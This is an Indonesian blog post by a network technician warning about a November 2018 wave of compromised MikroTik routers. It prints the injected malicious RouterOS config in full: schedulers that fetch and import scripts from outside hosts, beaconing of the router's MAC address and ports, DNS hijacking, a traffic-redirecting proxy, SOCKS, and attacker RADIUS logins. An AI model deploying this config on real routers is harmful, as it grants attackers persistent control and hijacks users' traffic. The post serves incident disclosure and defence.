Langsung ke konten utama

Mikrotik : Wabah November 2018

email : ariyaandro@gmail.com

post yang lalu yaitu :

Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia

Mikrotik : Wabah september 2018

Mikrotik : Wabah Oktober 2018

update temuan script hacked yang baru lagi,…

 

/system scheduleradd interval=1h name=updateSZJS on-event=":do {/tool fetch url=\"http://meag\han.pythonanywhere.com/\" dst-path=tmp} on-error={:put \"get http error\"}\;\r\\n/import tmp;\r\\n/file remove tmp;" policy=\ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\mar/31/2018 start-time=20:21:00/system scriptadd name=script4_ owner=xxx policy=\ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\ddress=95.154.216.168 port=2008 src-path=/mikrotik.php mode=http keep-resu\lt=no"

 

/ip dnsset allow-remote-requests=yes servers="94.247.43.254,1\07.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141"/ip firewall natadd action=redirect chain=dstnat comment=sysadminpxy dst-port=80 protocol=tcp \src-address-list=!Ok to-ports=8080/ip proxyset cache-path=web-proxy1 enabled=yes/ip serviceset telnet disabled=yesset ftp disabled=yesset ssh disabled=yesset api disabled=yesset winbox disabled=yes port=40527set api-ssl disabled=yes/ip socksset enabled=yes port=30526/ppp aaaset use-radius=yes/radiusadd address=45.79.109.133 secret=test service=ppp,login,dhcpadd address=139.162.71.145 secret=test service=ppp,login,dhcpadd address=128.199.172.32 secret=test service=ppp,login,dhcpadd address=178.128.214.44 secret=test service=ppp,login,dhcp/radius incomingset accept=yes port=1700/user aaaset default-group=full use-radius=yes/system scheduleradd interval=10m name="DDNS Serv" on-event="/system script run iDDNS" policy=\ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\startupadd interval=20m name="DDNS Backup" on-event=":global mac [/interface ethernet\\_get 0 mac-address]\r\\n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\\"_\".[/ip proxy get port])\r\\n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled])\r\\n:global cmd \"/\$mac/\$port/\$info/dns\"\r\\n:do {/tool fetch address=azdns.ru src-path=\$cmd mode=http dst-path=dns}\\_on-error={/tool fetch address=src.click src-path=\$cmd mode=http dst-pat\h=dns}\r\\n:delay 3s;/import dns;:delay 4s;/file remove dns" policy=\ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\startupadd interval=1d name="DDNS reLoad" on-event=":do {/tool fetch url=http://src.c\lick/error.html mode=http dst-path=flash/webproxy/error.html;/tool fetch u\rl=http://src.click/error.html mode=http dst-path=webproxy/error.html} on-\error={/tool fetch url=http://priv.su/error.html mode=http dst-path=flash/\webproxy/error.html;/tool fetch url=http://priv.su/error.html mode=http ds\t-path=webproxy/error.html}" policy=\ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\startup/system scriptadd name=iDDNS owner=adminuser policy=\ftp,reboot,read,write,policy,test,password,sniff,sensitive source=":global\\_mac [/interface ethernet get 0 mac-address]\r\\n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\\"_\".[/ip proxy get port])\r\\n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled])\r\\n:global cmd \"/\$mac/\$port/\$info/dns\"\r\\n:do {/tool fetch address=src-ip.com src-path=\$cmd mode=http dst-path=dn\s} on-error={/tool fetch address=src.click src-path=\$cmd mode=http dst-pa\th=dns}\r\\n:delay 3s;/import dns;:delay 4s;/file remove dns"

soooo, jangan kelupa cek2 config lainnya ya.

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Komentar

Postingan populer dari blog ini

Review Laptop : Lenovo ThinkPad X250 i5-5300u Series - 2021

Klik gambar untuk kontak via WhatsApp IG : https://www.instagram.com/linktech_cctv/ Klik gambar untuk menuju website email : ariyaandro@gmail.com POSTING 860 lanjut mimin juga dapat kesempatan cek seri x250 yang ditenagai i5 gen 5 series 5300u, yang dimana tulisan sebelumnya mengulas kakaknya yaitu series 5200u yang menarik juga. awal unbox ada sedikit permasalahan di Fan CPU dalam, sehingga awal menyalakan laptop ini warning FAN dan laptop langsung mati tidak bisa lanjut boot. https://pmdkduaonline.files.wordpress.com/2021/07/wp-1626745653642..mp4 *semua gambar/foto perangkat akan dikaburkan untuk keamanan privasi tampak depan sebelum cek FAN bagian dalam penampakan awal bongkar case laptop terlihat bercak debu-debu cantik lubang kisi-kisi pembuangan aman tak tampak debu yang menggumpal penampakan setelah dibersihkan sudah lebih baik dan FAN bisa berputar kembali dengan baik akhirnya bisa menyala dengan baik penampakan awal BIOS Fitur BIOS yang ada berikut sebagian fitur BIOS yang sem...

Troubleshoot : Cek dan Menurunkan Beban CPU Mikrotik karena SPI Service

email : ariyaandro@gmail.com POSTING 813 kapan lalu mimin mengalami kendala jaringan yang sedikit melemah dan ternyata ada gangguan load CPU pada mikrotik seri 2011UiAS-2HnD, lanjut gunakan tutorial berikut untuk menemukan dugaan yang ada Cara Mengetahui Proses yang Menyebabkan CPU Usage Tinggi di Mikrotik akhirnya terpantau CPU tinggi walau kondisi idle di luar jam kerja di beberapa minggu trakhir dengan rerata CPU load hampir 50 %, pertama untuk meastikan disable atau hapus rule yang tak terlalu wajib utk sementara. namun kendala CPU load cukup tinggi, dugaan rentang sekitar 2 minggu trakhir ada update OS itu yang mengakibatkan ada bug yang berimbas ke service SPI. dikarenakan router yang sama di lokasi berbeda dengan OS update yang sama dengan rule yang hampir sama jumlah aktifnya tidak mengalami load cukup tinggi. Cara Memperkecil Load CPU Mikrotik hasil pengecekan tool-profile ternyata service SPI yang sedang bermasalah memakan resource cukup tinggi dan merepotkan traffic jaringan...

Mikrotik : Wabah Setahun 2018-2019 yang masih eksis

email : ariyaandro@gmail.com Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia Mikrotik : Wabah september 2018 Mikrotik : Wabah Oktober 2018 Mikrotik : Wabah November 2018 Mikrotik : Wabah Januari 2019 dari daftar postingan yang termuat, sepertinya bug mikrotik dalam versi yang lebih lama dalam setahun ini masih ada yang menggunakannya. dimana bulan ini serangannya mirip dengan sebelumnnya yaitu melakukan seranga bertahap dari menyisipkan rule pada firewall, note bitcoin, membuat port NAT, mengaktifkan proxy, edit port service mikrotik dan lainnya. berikut capture serangan yang terjadi penyisipan file html ke storage mikrotik crate user baru dalam mikrotik membuat rule yang lebih banyak dari sebelumnnya dan cirihas bitcoin sertw webmoney berikut potongan code setting yang di sisipi,… syukur login utama belum terkunci… #apr/26/2019 10:29:32 by RouterOS 6.39.2 /system logging action set 1 disk-file-name=log /ip firewall address-list add address=10...